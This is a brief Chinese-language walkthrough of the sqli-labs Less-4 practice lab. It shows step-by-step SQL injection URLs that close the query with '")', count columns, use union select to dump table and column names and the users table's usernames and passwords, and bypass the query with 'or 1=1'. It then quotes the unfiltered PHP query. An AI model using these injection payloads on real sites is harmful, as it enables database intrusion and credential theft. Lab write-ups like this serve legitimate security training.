http://sqlilabs/Less-4/?id=1
回显正常
http://sqlilabs/Less-4/?id=1'
回显正常
http://sqlilabs/Less-4/?id=1"
回显报错
报错信息表明还有个括号:
http://sqlilabs/Less-4/?id=1")--+
回显正常
接下来又是一波常规操作:
http://sqlilabs/Less-1/?id=1") order by 3--+
http://sqlilabs/Less-1/?id=1") order by 4--+
http://sqlilabs/Less-1/?id=-1") union select 1,2,3--+
http://sqlilabs/Less-1/?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
http://sqlilabs/Less-1/?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema=database()--+
http://sqlilabs/Less-1/?id=-1") union select 1,2,(select group_concat(username,0x3a,password) from users) users--+
除此之外还可以一步到位:
http://sqlilabs/Less-4/?id=1") or 1=1--+
http://sqlilabs/Less-4/?id=1") or "1"=("1
源代码中的 sql 语句为:
$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
且未对 id 进行任何过滤
:D